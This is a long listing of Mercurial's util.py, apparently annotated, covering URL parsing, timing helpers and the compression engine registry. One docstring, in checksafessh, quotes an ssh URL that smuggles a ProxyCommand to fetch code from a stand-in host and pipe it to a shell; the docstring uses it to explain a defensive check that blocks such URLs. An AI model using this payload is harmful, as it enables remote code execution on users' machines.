2603 2603 _safepchars = "/!~*'()+:\\"
2604 2604 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2605 2605
2606 2606 def __init__(self, path, parsequery=True, parsefragment=True):
2607 2607 # We slowly chomp away at path until we have only the path left
2608 2608 self.scheme = self.user = self.passwd = self.host = None
2609 2609 self.port = self.path = self.query = self.fragment = None
2610 2610 self._localpath = True
2611 2611 self._hostport = ''
2612 2612 self._origpath = path
2613 2613
2614 2614 if parsefragment and '#' in path:
2615 2615 path, self.fragment = path.split('#', 1)
2616 2616
2617 2617 # special case for Windows drive letters and UNC paths
2618 2618 if hasdriveletter(path) or path.startswith('\\\\'):
2619 2619 self.path = path
2620 2620 return
2621 2621
2622 2622 # For compatibility reasons, we can't handle bundle paths as
2623 2623 # normal URLS
2624 2624 if path.startswith('bundle:'):
2625 2625 self.scheme = 'bundle'
2626 2626 path = path[7:]
2627 2627 if path.startswith('//'):
2628 2628 path = path[2:]
2629 2629 self.path = path
2630 2630 return
2631 2631
2632 2632 if self._matchscheme(path):
2633 2633 parts = path.split(':', 1)
2634 2634 if parts[0]:
2635 2635 self.scheme, path = parts
2636 2636 self._localpath = False
2637 2637
2638 2638 if not path:
2639 2639 path = None
2640 2640 if self._localpath:
2641 2641 self.path = ''
2642 2642 return
2643 2643 else:
2644 2644 if self._localpath:
2645 2645 self.path = path
2646 2646 return
2647 2647
2648 2648 if parsequery and '?' in path:
2649 2649 path, self.query = path.split('?', 1)
2650 2650 if not path:
2651 2651 path = None
2652 2652 if not self.query:
2653 2653 self.query = None
2654 2654
2655 2655 # // is required to specify a host/authority
2656 2656 if path and path.startswith('//'):
2657 2657 parts = path[2:].split('/', 1)
2658 2658 if len(parts) > 1:
2659 2659 self.host, path = parts
2660 2660 else:
2661 2661 self.host = parts[0]
2662 2662 path = None
2663 2663 if not self.host:
2664 2664 self.host = None
2665 2665 # path of file:///d is /d
2666 2666 # path of file:///d:/ is d:/, not /d:/
2667 2667 if path and not hasdriveletter(path):
2668 2668 path = '/' + path
2669 2669
2670 2670 if self.host and '@' in self.host:
2671 2671 self.user, self.host = self.host.rsplit('@', 1)
2672 2672 if ':' in self.user:
2673 2673 self.user, self.passwd = self.user.split(':', 1)
2674 2674 if not self.host:
2675 2675 self.host = None
2676 2676
2677 2677 # Don't split on colons in IPv6 addresses without ports
2678 2678 if (self.host and ':' in self.host and
2679 2679 not (self.host.startswith('[') and self.host.endswith(']'))):
2680 2680 self._hostport = self.host
2681 2681 self.host, self.port = self.host.rsplit(':', 1)
2682 2682 if not self.host:
2683 2683 self.host = None
2684 2684
2685 2685 if (self.host and self.scheme == 'file' and
2686 2686 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2687 2687 raise error.Abort(_('file:// URLs can only refer to localhost'))
2688 2688
2689 2689 self.path = path
2690 2690
2691 2691 # leave the query string escaped
2692 2692 for a in ('user', 'passwd', 'host', 'port',
2693 2693 'path', 'fragment'):
2694 2694 v = getattr(self, a)
2695 2695 if v is not None:
2696 2696 setattr(self, a, urlreq.unquote(v))
2697 2697
2698 2698 @encoding.strmethod
2699 2699 def __repr__(self):
2700 2700 attrs = []
2701 2701 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2702 2702 'query', 'fragment'):
2703 2703 v = getattr(self, a)
2704 2704 if v is not None:
2705 2705 attrs.append('%s: %r' % (a, v))
2706 2706 return '<url %s>' % ', '.join(attrs)
2707 2707
2708 2708 def __bytes__(self):
2709 2709 r"""Join the URL's components back into a URL string.
2710 2710
2711 2711 Examples:
2712 2712
2713 2713 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2714 2714 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2715 2715 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2716 2716 'http://user:pw@host:80/?foo=bar&baz=42'
2717 2717 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2718 2718 'http://user:pw@host:80/?foo=bar%3dbaz'
2719 2719 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2720 2720 'ssh://user:pw@[::1]:2200//home/joe#'
2721 2721 >>> bytes(url(b'http://localhost:80//'))
2722 2722 'http://localhost:80//'
2723 2723 >>> bytes(url(b'http://localhost:80/'))
2724 2724 'http://localhost:80/'
2725 2725 >>> bytes(url(b'http://localhost:80'))
2726 2726 'http://localhost:80/'
2727 2727 >>> bytes(url(b'bundle:foo'))
2728 2728 'bundle:foo'
2729 2729 >>> bytes(url(b'bundle://../foo'))
2730 2730 'bundle:../foo'
2731 2731 >>> bytes(url(b'path'))
2732 2732 'path'
2733 2733 >>> bytes(url(b'file:///tmp/foo/bar'))
2734 2734 'file:///tmp/foo/bar'
2735 2735 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2736 2736 'file:///c:/tmp/foo/bar'
2737 2737 >>> print(url(br'bundle:foo\bar'))
2738 2738 bundle:foo\bar
2739 2739 >>> print(url(br'file:///D:\data\hg'))
2740 2740 file:///D:\data\hg
2741 2741 """
2742 2742 if self._localpath:
2743 2743 s = self.path
2744 2744 if self.scheme == 'bundle':
2745 2745 s = 'bundle:' + s
2746 2746 if self.fragment:
2747 2747 s += '#' + self.fragment
2748 2748 return s
2749 2749
2750 2750 s = self.scheme + ':'
2751 2751 if self.user or self.passwd or self.host:
2752 2752 s += '//'
2753 2753 elif self.scheme and (not self.path or self.path.startswith('/')
2754 2754 or hasdriveletter(self.path)):
2755 2755 s += '//'
2756 2756 if hasdriveletter(self.path):
2757 2757 s += '/'
2758 2758 if self.user:
2759 2759 s += urlreq.quote(self.user, safe=self._safechars)
2760 2760 if self.passwd:
2761 2761 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2762 2762 if self.user or self.passwd:
2763 2763 s += '@'
2764 2764 if self.host:
2765 2765 if not (self.host.startswith('[') and self.host.endswith(']')):
2766 2766 s += urlreq.quote(self.host)
2767 2767 else:
2768 2768 s += self.host
2769 2769 if self.port:
2770 2770 s += ':' + urlreq.quote(self.port)
2771 2771 if self.host:
2772 2772 s += '/'
2773 2773 if self.path:
2774 2774 # TODO: similar to the query string, we should not unescape the
2775 2775 # path when we store it, the path might contain '%2f' = '/',
2776 2776 # which we should *not* escape.
2777 2777 s += urlreq.quote(self.path, safe=self._safepchars)
2778 2778 if self.query:
2779 2779 # we store the query in escaped form.
2780 2780 s += '?' + self.query
2781 2781 if self.fragment is not None:
2782 2782 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2783 2783 return s
2784 2784
2785 2785 __str__ = encoding.strmethod(__bytes__)
2786 2786
2787 2787 def authinfo(self):
2788 2788 user, passwd = self.user, self.passwd
2789 2789 try:
2790 2790 self.user, self.passwd = None, None
2791 2791 s = bytes(self)
2792 2792 finally:
2793 2793 self.user, self.passwd = user, passwd
2794 2794 if not self.user:
2795 2795 return (s, None)
2796 2796 # authinfo[1] is passed to urllib2 password manager, and its
2797 2797 # URIs must not contain credentials. The host is passed in the
2798 2798 # URIs list because Python < 2.4.3 uses only that to search for
2799 2799 # a password.
2800 2800 return (s, (None, (s, self.host),
2801 2801 self.user, self.passwd or ''))
2802 2802
2803 2803 def isabs(self):
2804 2804 if self.scheme and self.scheme != 'file':
2805 2805 return True # remote URL
2806 2806 if hasdriveletter(self.path):
2807 2807 return True # absolute for our purposes - can't be joined()
2808 2808 if self.path.startswith(br'\\'):
2809 2809 return True # Windows UNC path
2810 2810 if self.path.startswith('/'):
2811 2811 return True # POSIX-style
2812 2812 return False
2813 2813
2814 2814 def localpath(self):
2815 2815 if self.scheme == 'file' or self.scheme == 'bundle':
2816 2816 path = self.path or '/'
2817 2817 # For Windows, we need to promote hosts containing drive
2818 2818 # letters to paths with drive letters.
2819 2819 if hasdriveletter(self._hostport):
2820 2820 path = self._hostport + '/' + self.path
2821 2821 elif (self.host is not None and self.path
2822 2822 and not hasdriveletter(path)):
2823 2823 path = '/' + path
2824 2824 return path
2825 2825 return self._origpath
2826 2826
2827 2827 def islocal(self):
2828 2828 '''whether localpath will return something that posixfile can open'''
2829 2829 return (not self.scheme or self.scheme == 'file'
2830 2830 or self.scheme == 'bundle')
2831 2831
2832 2832 def hasscheme(path):
2833 2833 return bool(url(path).scheme)
2834 2834
2835 2835 def hasdriveletter(path):
2836 2836 return path and path[1:2] == ':' and path[0:1].isalpha()
2837 2837
2838 2838 def urllocalpath(path):
2839 2839 return url(path, parsequery=False, parsefragment=False).localpath()
2840 2840
2841 2841 def checksafessh(path):
2842 2842 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2843 2843
2844 2844 This is a sanity check for ssh urls. ssh will parse the first item as
2845 2845 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploitable urls entirely and warn the
    user.
2848 2848
2849 2849 Raises an error.Abort when the url is unsafe.
2850 2850 """
2851 2851 path = urlreq.unquote(path)
2852 2852 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2853 2853 raise error.Abort(_('potentially unsafe url: %r') %
2854 2854 (pycompat.bytestr(path),))
2855 2855
2856 2856 def hidepassword(u):
2857 2857 '''hide user credential in a url string'''
2858 2858 u = url(u)
2859 2859 if u.passwd:
2860 2860 u.passwd = '***'
2861 2861 return bytes(u)
2862 2862
2863 2863 def removeauth(u):
2864 2864 '''remove all authentication information from a url string'''
2865 2865 u = url(u)
2866 2866 u.user = u.passwd = None
    return bytes(u)
2868 2868
2869 2869 timecount = unitcountfn(
2870 2870 (1, 1e3, _('%.0f s')),
2871 2871 (100, 1, _('%.1f s')),
2872 2872 (10, 1, _('%.2f s')),
2873 2873 (1, 1, _('%.3f s')),
2874 2874 (100, 0.001, _('%.1f ms')),
2875 2875 (10, 0.001, _('%.2f ms')),
2876 2876 (1, 0.001, _('%.3f ms')),
2877 2877 (100, 0.000001, _('%.1f us')),
2878 2878 (10, 0.000001, _('%.2f us')),
2879 2879 (1, 0.000001, _('%.3f us')),
2880 2880 (100, 0.000000001, _('%.1f ns')),
2881 2881 (10, 0.000000001, _('%.2f ns')),
2882 2882 (1, 0.000000001, _('%.3f ns')),
2883 2883 )
2884 2884
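# Rendering sketch for timecount, the duration analogue of bytecount above:
# input is in seconds and falls through to the finest matching unit row.
#
#   timecount(2.5)                           # -> '2.500 s'
#   timecount(0.000042)                      # -> '42.00 us'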
2885 2885 _timenesting = [0]
2886 2886
2887 2887 def timed(func):
2888 2888 '''Report the execution time of a function call to stderr.
2889 2889
2890 2890 During development, use as a decorator when you need to measure
2891 2891 the cost of a function, e.g. as follows:
2892 2892
2893 2893 @util.timed
2894 2894 def foo(a, b, c):
2895 2895 pass
2896 2896 '''
2897 2897
2898 2898 def wrapper(*args, **kwargs):
2899 2899 start = timer()
2900 2900 indent = 2
2901 2901 _timenesting[0] += indent
2902 2902 try:
2903 2903 return func(*args, **kwargs)
2904 2904 finally:
2905 2905 elapsed = timer() - start
2906 2906 _timenesting[0] -= indent
2907 2907 stderr.write('%s%s: %s\n' %
2908 2908 (' ' * _timenesting[0], func.__name__,
2909 2909 timecount(elapsed)))
2910 2910 return wrapper
2911 2911
2912 2912 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2913 2913 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2914 2914
2915 2915 def sizetoint(s):
2916 2916 '''Convert a space specifier to a byte count.
2917 2917
2918 2918 >>> sizetoint(b'30')
2919 2919 30
2920 2920 >>> sizetoint(b'2.2kb')
2921 2921 2252
2922 2922 >>> sizetoint(b'6M')
2923 2923 6291456
2924 2924 '''
2925 2925 t = s.strip().lower()
2926 2926 try:
2927 2927 for k, u in _sizeunits:
2928 2928 if t.endswith(k):
2929 2929 return int(float(t[:-len(k)]) * u)
2930 2930 return int(t)
2931 2931 except ValueError:
2932 2932 raise error.ParseError(_("couldn't parse size: %s") % s)
2933 2933
2934 2934 class hooks(object):
2935 2935 '''A collection of hook functions that can be used to extend a
2936 2936 function's behavior. Hooks are called in lexicographic order,
2937 2937 based on the names of their sources.'''
2938 2938
2939 2939 def __init__(self):
2940 2940 self._hooks = []
2941 2941
2942 2942 def add(self, source, hook):
2943 2943 self._hooks.append((source, hook))
2944 2944
2945 2945 def __call__(self, *args):
2946 2946 self._hooks.sort(key=lambda x: x[0])
2947 2947 results = []
2948 2948 for source, hook in self._hooks:
2949 2949 results.append(hook(*args))
2950 2950 return results
2951 2951
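# Ordering sketch for the hooks class (source names are illustrative):
# callbacks fire in lexicographic order of their source names, not in
# registration order.
#
#   h = hooks()
#   h.add(b'z-ext', lambda ui: 2)
#   h.add(b'a-ext', lambda ui: 1)
#   h(None)                                  # -> [1, 2]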
2952 2952 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2953 2953 '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
2955 2955 Each file+linenumber is formatted according to fileline.
2956 2956 Each line is formatted according to line.
2957 2957 If line is None, it yields:
2958 2958 length of longest filepath+line number,
2959 2959 filepath+linenumber,
2960 2960 function
2961 2961
    Not to be used in production code, but very convenient while developing.
2963 2963 '''
2964 2964 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2965 2965 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2966 2966 ][-depth:]
2967 2967 if entries:
2968 2968 fnmax = max(len(entry[0]) for entry in entries)
2969 2969 for fnln, func in entries:
2970 2970 if line is None:
2971 2971 yield (fnmax, fnln, func)
2972 2972 else:
2973 2973 yield line % (fnmax, fnln, func)
2974 2974
2975 2975 def debugstacktrace(msg='stacktrace', skip=0,
2976 2976 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2977 2977 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require a ui object.
    Not to be used in production code, but very convenient while developing.
2982 2982 '''
2983 2983 if otherf:
2984 2984 otherf.flush()
2985 2985 f.write('%s at:\n' % msg.rstrip())
2986 2986 for line in getstackframes(skip + 1, depth=depth):
2987 2987 f.write(line)
2988 2988 f.flush()
2989 2989
2990 2990 class dirs(object):
2991 2991 '''a multiset of directory names from a dirstate or manifest'''
2992 2992
2993 2993 def __init__(self, map, skip=None):
2994 2994 self._dirs = {}
2995 2995 addpath = self.addpath
2996 2996 if safehasattr(map, 'iteritems') and skip is not None:
2997 2997 for f, s in map.iteritems():
2998 2998 if s[0] != skip:
2999 2999 addpath(f)
3000 3000 else:
3001 3001 for f in map:
3002 3002 addpath(f)
3003 3003
3004 3004 def addpath(self, path):
3005 3005 dirs = self._dirs
3006 3006 for base in finddirs(path):
3007 3007 if base in dirs:
3008 3008 dirs[base] += 1
3009 3009 return
3010 3010 dirs[base] = 1
3011 3011
3012 3012 def delpath(self, path):
3013 3013 dirs = self._dirs
3014 3014 for base in finddirs(path):
3015 3015 if dirs[base] > 1:
3016 3016 dirs[base] -= 1
3017 3017 return
3018 3018 del dirs[base]
3019 3019
3020 3020 def __iter__(self):
3021 3021 return iter(self._dirs)
3022 3022
3023 3023 def __contains__(self, d):
3024 3024 return d in self._dirs
3025 3025
3026 3026 if safehasattr(parsers, 'dirs'):
3027 3027 dirs = parsers.dirs
3028 3028
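# Multiset sketch for dirs (pure-Python and C versions agree): every path
# contributes a reference count to each ancestor directory, so a directory
# only disappears when the last path under it is removed.
#
#   d = dirs([b'a/b/c', b'a/d'])
#   b'a' in d                                # -> True
#   d.delpath(b'a/d')
#   b'a' in d                                # -> True (still held by a/b/c)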
3029 3029 def finddirs(path):
3030 3030 pos = path.rfind('/')
3031 3031 while pos != -1:
3032 3032 yield path[:pos]
3033 3033 pos = path.rfind('/', 0, pos)
3034 3034
3035 3035 # compression code
3036 3036
3037 3037 SERVERROLE = 'server'
3038 3038 CLIENTROLE = 'client'
3039 3039
3040 3040 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3041 3041 (u'name', u'serverpriority',
3042 3042 u'clientpriority'))
3043 3043
3044 3044 class compressormanager(object):
3045 3045 """Holds registrations of various compression engines.
3046 3046
3047 3047 This class essentially abstracts the differences between compression
3048 3048 engines to allow new compression formats to be added easily, possibly from
3049 3049 extensions.
3050 3050
3051 3051 Compressors are registered against the global instance by calling its
3052 3052 ``register()`` method.
3053 3053 """
3054 3054 def __init__(self):
3055 3055 self._engines = {}
3056 3056 # Bundle spec human name to engine name.
3057 3057 self._bundlenames = {}
3058 3058 # Internal bundle identifier to engine name.
3059 3059 self._bundletypes = {}
3060 3060 # Revlog header to engine name.
3061 3061 self._revlogheaders = {}
3062 3062 # Wire proto identifier to engine name.
3063 3063 self._wiretypes = {}
3064 3064
3065 3065 def __getitem__(self, key):
3066 3066 return self._engines[key]
3067 3067
3068 3068 def __contains__(self, key):
3069 3069 return key in self._engines
3070 3070
3071 3071 def __iter__(self):
3072 3072 return iter(self._engines.keys())
3073 3073
3074 3074 def register(self, engine):
3075 3075 """Register a compression engine with the manager.
3076 3076
3077 3077 The argument must be a ``compressionengine`` instance.
3078 3078 """
3079 3079 if not isinstance(engine, compressionengine):
3080 3080 raise ValueError(_('argument must be a compressionengine'))
3081 3081
3082 3082 name = engine.name()
3083 3083
3084 3084 if name in self._engines:
3085 3085 raise error.Abort(_('compression engine %s already registered') %
3086 3086 name)
3087 3087
3088 3088 bundleinfo = engine.bundletype()
3089 3089 if bundleinfo:
3090 3090 bundlename, bundletype = bundleinfo
3091 3091
3092 3092 if bundlename in self._bundlenames:
3093 3093 raise error.Abort(_('bundle name %s already registered') %
3094 3094 bundlename)
3095 3095 if bundletype in self._bundletypes:
3096 3096 raise error.Abort(_('bundle type %s already registered by %s') %
3097 3097 (bundletype, self._bundletypes[bundletype]))
3098 3098
3099 3099 # No external facing name declared.
3100 3100 if bundlename:
3101 3101 self._bundlenames[bundlename] = name
3102 3102
3103 3103 self._bundletypes[bundletype] = name
3104 3104
3105 3105 wiresupport = engine.wireprotosupport()
3106 3106 if wiresupport:
3107 3107 wiretype = wiresupport.name
3108 3108 if wiretype in self._wiretypes:
3109 3109 raise error.Abort(_('wire protocol compression %s already '
3110 3110 'registered by %s') %
3111 3111 (wiretype, self._wiretypes[wiretype]))
3112 3112
3113 3113 self._wiretypes[wiretype] = name
3114 3114
3115 3115 revlogheader = engine.revlogheader()
3116 3116 if revlogheader and revlogheader in self._revlogheaders:
3117 3117 raise error.Abort(_('revlog header %s already registered by %s') %
3118 3118 (revlogheader, self._revlogheaders[revlogheader]))
3119 3119
3120 3120 if revlogheader:
3121 3121 self._revlogheaders[revlogheader] = name
3122 3122
3123 3123 self._engines[name] = engine
3124 3124
3125 3125 @property
3126 3126 def supportedbundlenames(self):
3127 3127 return set(self._bundlenames.keys())
3128 3128
3129 3129 @property
3130 3130 def supportedbundletypes(self):
3131 3131 return set(self._bundletypes.keys())
3132 3132
3133 3133 def forbundlename(self, bundlename):
3134 3134 """Obtain a compression engine registered to a bundle name.
3135 3135
3136 3136 Will raise KeyError if the bundle type isn't registered.
3137 3137
3138 3138 Will abort if the engine is known but not available.
3139 3139 """
3140 3140 engine = self._engines[self._bundlenames[bundlename]]
3141 3141 if not engine.available():
3142 3142 raise error.Abort(_('compression engine %s could not be loaded') %
3143 3143 engine.name())
3144 3144 return engine
3145 3145
3146 3146 def forbundletype(self, bundletype):
3147 3147 """Obtain a compression engine registered to a bundle type.
3148 3148
3149 3149 Will raise KeyError if the bundle type isn't registered.
3150 3150
3151 3151 Will abort if the engine is known but not available.
3152 3152 """
3153 3153 engine = self._engines[self._bundletypes[bundletype]]
3154 3154 if not engine.available():
3155 3155 raise error.Abort(_('compression engine %s could not be loaded') %
3156 3156 engine.name())
3157 3157 return engine
3158 3158
3159 3159 def supportedwireengines(self, role, onlyavailable=True):
3160 3160 """Obtain compression engines that support the wire protocol.
3161 3161
3162 3162 Returns a list of engines in prioritized order, most desired first.
3163 3163
3164 3164 If ``onlyavailable`` is set, filter out engines that can't be
3165 3165 loaded.
3166 3166 """
3167 3167 assert role in (SERVERROLE, CLIENTROLE)
3168 3168
3169 3169 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3170 3170
3171 3171 engines = [self._engines[e] for e in self._wiretypes.values()]
3172 3172 if onlyavailable:
3173 3173 engines = [e for e in engines if e.available()]
3174 3174
3175 3175 def getkey(e):
3176 3176 # Sort first by priority, highest first. In case of tie, sort
3177 3177 # alphabetically. This is arbitrary, but ensures output is
3178 3178 # stable.
3179 3179 w = e.wireprotosupport()
3180 3180 return -1 * getattr(w, attr), w.name
3181 3181
        return sorted(engines, key=getkey)
3183 3183
3184 3184 def forwiretype(self, wiretype):
3185 3185 engine = self._engines[self._wiretypes[wiretype]]
3186 3186 if not engine.available():
3187 3187 raise error.Abort(_('compression engine %s could not be loaded') %
3188 3188 engine.name())
3189 3189 return engine
3190 3190
3191 3191 def forrevlogheader(self, header):
3192 3192 """Obtain a compression engine registered to a revlog header.
3193 3193
3194 3194 Will raise KeyError if the revlog header value isn't registered.
3195 3195 """
3196 3196 return self._engines[self._revlogheaders[header]]
3197 3197
3198 3198 compengines = compressormanager()
3199 3199
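# Registration sketch for the global manager above ('mycustomengine' is
# hypothetical): extensions subclass compressionengine, defined below, and
# register an instance, which indexes it under its declared bundle name/type,
# wire protocol name and revlog header.
#
#   compengines.register(mycustomengine())
#   compengines.forbundlename(b'mycustom')   # -> the engine, once declared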
3200 3200 class compressionengine(object):
3201 3201 """Base class for compression engines.
3202 3202
3203 3203 Compression engines must implement the interface defined by this class.
3204 3204 """
3205 3205 def name(self):
3206 3206 """Returns the name of the compression engine.
3207 3207
3208 3208 This is the key the engine is registered under.
3209 3209
3210 3210 This method must be implemented.
3211 3211 """
3212 3212 raise NotImplementedError()
3213 3213
3214 3214 def available(self):
3215 3215 """Whether the compression engine is available.
3216 3216
3217 3217 The intent of this method is to allow optional compression engines
3218 3218 that may not be available in all installations (such as engines relying
3219 3219 on C extensions that may not be present).
3220 3220 """
3221 3221 return True
3222 3222
3223 3223 def bundletype(self):
3224 3224 """Describes bundle identifiers for this engine.
3225 3225
3226 3226 If this compression engine isn't supported for bundles, returns None.
3227 3227
3228 3228 If this engine can be used for bundles, returns a 2-tuple of strings of
3229 3229 the user-facing "bundle spec" compression name and an internal
3230 3230 identifier used to denote the compression format within bundles. To
3231 3231 exclude the name from external usage, set the first element to ``None``.
3232 3232
3233 3233 If bundle compression is supported, the class must also implement
3234 3234 ``compressstream`` and `decompressorreader``.
3235 3235
3236 3236 The docstring of this method is used in the help system to tell users
3237 3237 about this engine.
3238 3238 """
3239 3239 return None
3240 3240
3241 3241 def wireprotosupport(self):
3242 3242 """Declare support for this compression format on the wire protocol.
3243 3243
3244 3244 If this compression engine isn't supported for compressing wire
3245 3245 protocol payloads, returns None.
3246 3246
3247 3247 Otherwise, returns ``compenginewireprotosupport`` with the following
3248 3248 fields:
3249 3249
3250 3250 * String format identifier
3251 3251 * Integer priority for the server
3252 3252 * Integer priority for the client
3253 3253
3254 3254 The integer priorities are used to order the advertisement of format
3255 3255 support by server and client. The highest integer is advertised
3256 3256 first. Integers with non-positive values aren't advertised.
3257 3257
3258 3258 The priority values are somewhat arbitrary and only used for default
3259 3259 ordering. The relative order can be changed via config options.
3260 3260
3261 3261 If wire protocol compression is supported, the class must also implement
3262 3262 ``compressstream`` and ``decompressorreader``.
3263 3263 """
3264 3264 return None
3265 3265
3266 3266 def revlogheader(self):
3267 3267 """Header added to revlog chunks that identifies this engine.
3268 3268
3269 3269 If this engine can be used to compress revlogs, this method should
3270 3270 return the bytes used to identify chunks compressed with this engine.
3271 3271 Else, the method should return ``None`` to indicate it does not
3272 3272 participate in revlog compression.
3273 3273 """
3274 3274 return None
3275 3275
3276 3276 def compressstream(self, it, opts=None):
3277 3277 """Compress an iterator of chunks.
3278 3278
3279 3279 The method receives an iterator (ideally a generator) of chunks of
3280 3280 bytes to be compressed. It returns an iterator (ideally a generator)
3281 3281 of bytes of chunks representing the compressed output.
3282 3282
3283 3283 Optionally accepts an argument defining how to perform compression.
3284 3284 Each engine treats this argument differently.
3285 3285 """
3286 3286 raise NotImplementedError()
3287 3287
3288 3288 def decompressorreader(self, fh):
3289 3289 """Perform decompression on a file object.
3290 3290
3291 3291 Argument is an object with a ``read(size)`` method that returns
3292 3292 compressed data. Return value is an object with a ``read(size)`` that
3293 3293 returns uncompressed data.
3294 3294 """
3295 3295 raise NotImplementedError()
3296 3296
3297 3297 def revlogcompressor(self, opts=None):
3298 3298 """Obtain an object that can be used to compress revlog entries.
3299 3299
3300 3300 The object has a ``compress(data)`` method that compresses binary
3301 3301 data. This method returns compressed binary data or ``None`` if
3302 3302 the data could not be compressed (too small, not compressible, etc).
3303 3303 The returned data should have a header uniquely identifying this
3304 3304 compression format so decompression can be routed to this engine.
3305 3305 This header should be identified by the ``revlogheader()`` return
3306 3306 value.
3307 3307
3308 3308 The object has a ``decompress(data)`` method that decompresses
3309 3309 data. The method will only be called if ``data`` begins with
3310 3310 ``revlogheader()``. The method should return the raw, uncompressed
3311 3311 data or raise a ``RevlogError``.
3312 3312
3313 3313 The object is reusable but is not thread safe.
3314 3314 """
3315 3315 raise NotImplementedError()
3316 3316
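# A minimal sketch of the contract a new engine must satisfy before being
# registered; the engine name, bundle identifiers, and method bodies here are
# hypothetical, shown only to make the interface above concrete:
#
#   class _lz4engine(compressionengine):
#       def name(self):
#           return 'lz4'            # key under which compengines stores it
#       def bundletype(self):
#           """Hypothetical LZ4 bundle compression."""
#           return 'lz4', 'LZ4'     # (bundle spec name, internal identifier)
#       def compressstream(self, it, opts=None):
#           ...                     # required because bundletype() is set
#       def decompressorreader(self, fh):
#           ...                     # required because bundletype() is set
#
#   compengines.register(_lz4engine())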
3317 3317 class _zlibengine(compressionengine):
3318 3318 def name(self):
3319 3319 return 'zlib'
3320 3320
3321 3321 def bundletype(self):
3322 3322 """zlib compression using the DEFLATE algorithm.
3323 3323
3324 3324 All Mercurial clients should support this format. The compression
3325 3325 algorithm strikes a reasonable balance between speed and
3326 3326 compressed size.
3327 3327 """
3328 3328 return 'gzip', 'GZ'
3329 3329
3330 3330 def wireprotosupport(self):
3331 3331 return compewireprotosupport('zlib', 20, 20)
3332 3332
3333 3333 def revlogheader(self):
3334 3334 return 'x'
3335 3335
3336 3336 def compressstream(self, it, opts=None):
3337 3337 opts = opts or {}
3338 3338
3339 3339 z = zlib.compressobj(opts.get('level', -1))
3340 3340 for chunk in it:
3341 3341 data = z.compress(chunk)
3342 3342 # Not all calls to compress emit data. It is cheaper to inspect
3343 3343 # here than to feed empty chunks through the generator.
3344 3344 if data:
3345 3345 yield data
3346 3346
3347 3347 yield z.flush()
3348 3348
3349 3349 def decompressorreader(self, fh):
3350 3350 def gen():
3351 3351 d = zlib.decompressobj()
3352 3352 for chunk in filechunkiter(fh):
3353 3353 while chunk:
3354 3354 # Limit output size to limit memory.
3355 3355 yield d.decompress(chunk, 2 ** 18)
3356 3356 chunk = d.unconsumed_tail
3357 3357
3358 3358 return chunkbuffer(gen())
3359 3359
3360 3360 class zlibrevlogcompressor(object):
3361 3361 def compress(self, data):
3362 3362 insize = len(data)
3363 3363 # Caller handles empty input case.
3364 3364 assert insize > 0
3365 3365
3366 3366 if insize < 44:
3367 3367 return None
3368 3368
3369 3369 elif insize <= 1000000:
3370 3370 compressed = zlib.compress(data)
3371 3371 if len(compressed) < insize:
3372 3372 return compressed
3373 3373 return None
3374 3374
3375 3375 # zlib makes an internal copy of the input buffer, doubling
3376 3376 # memory usage for large inputs. So do streaming compression
3377 3377 # on large inputs.
3378 3378 else:
3379 3379 z = zlib.compressobj()
3380 3380 parts = []
3381 3381 pos = 0
3382 3382 while pos < insize:
3383 3383 pos2 = pos + 2**20
3384 3384 parts.append(z.compress(data[pos:pos2]))
3385 3385 pos = pos2
3386 3386 parts.append(z.flush())
3387 3387
3388 3388 if sum(map(len, parts)) < insize:
3389 3389 return ''.join(parts)
3390 3390 return None
3391 3391
3392 3392 def decompress(self, data):
3393 3393 try:
3394 3394 return zlib.decompress(data)
3395 3395 except zlib.error as e:
3396 3396 raise error.RevlogError(_('revlog decompress error: %s') %
3397 3397 stringutil.forcebytestr(e))
3398 3398
3399 3399 def revlogcompressor(self, opts=None):
3400 3400 return self.zlibrevlogcompressor()
3401 3401
3402 3402 compengines.register(_zlibengine())
3403 3403
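# An illustrative round trip through the engine just registered, using only
# the interfaces defined above (output shown in Python 2 bytes repr):
#
#   >>> engine = compengines['zlib']
#   >>> compressed = b''.join(engine.compressstream(iter([b'data'])))
#   >>> engine.decompressorreader(stringio(compressed)).read(4)
#   'data'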
3404 3404 class _bz2engine(compressionengine):
3405 3405 def name(self):
3406 3406 return 'bz2'
3407 3407
3408 3408 def bundletype(self):
3409 3409 """An algorithm that produces smaller bundles than ``gzip``.
3410 3410
3411 3411 All Mercurial clients should support this format.
3412 3412
3413 3413 This engine will likely produce smaller bundles than ``gzip`` but
3414 3414 will be significantly slower, both during compression and
3415 3415 decompression.
3416 3416
3417 3417 If available, the ``zstd`` engine can yield similar or better
3418 3418 compression at much higher speeds.
3419 3419 """
3420 3420 return 'bzip2', 'BZ'
3421 3421
3422 3422 # We declare a protocol name but don't advertise by default because
3423 3423 # it is slow.
3424 3424 def wireprotosupport(self):
3425 3425 return compewireprotosupport('bzip2', 0, 0)
3426 3426
3427 3427 def compressstream(self, it, opts=None):
3428 3428 opts = opts or {}
3429 3429 z = bz2.BZ2Compressor(opts.get('level', 9))
3430 3430 for chunk in it:
3431 3431 data = z.compress(chunk)
3432 3432 if data:
3433 3433 yield data
3434 3434
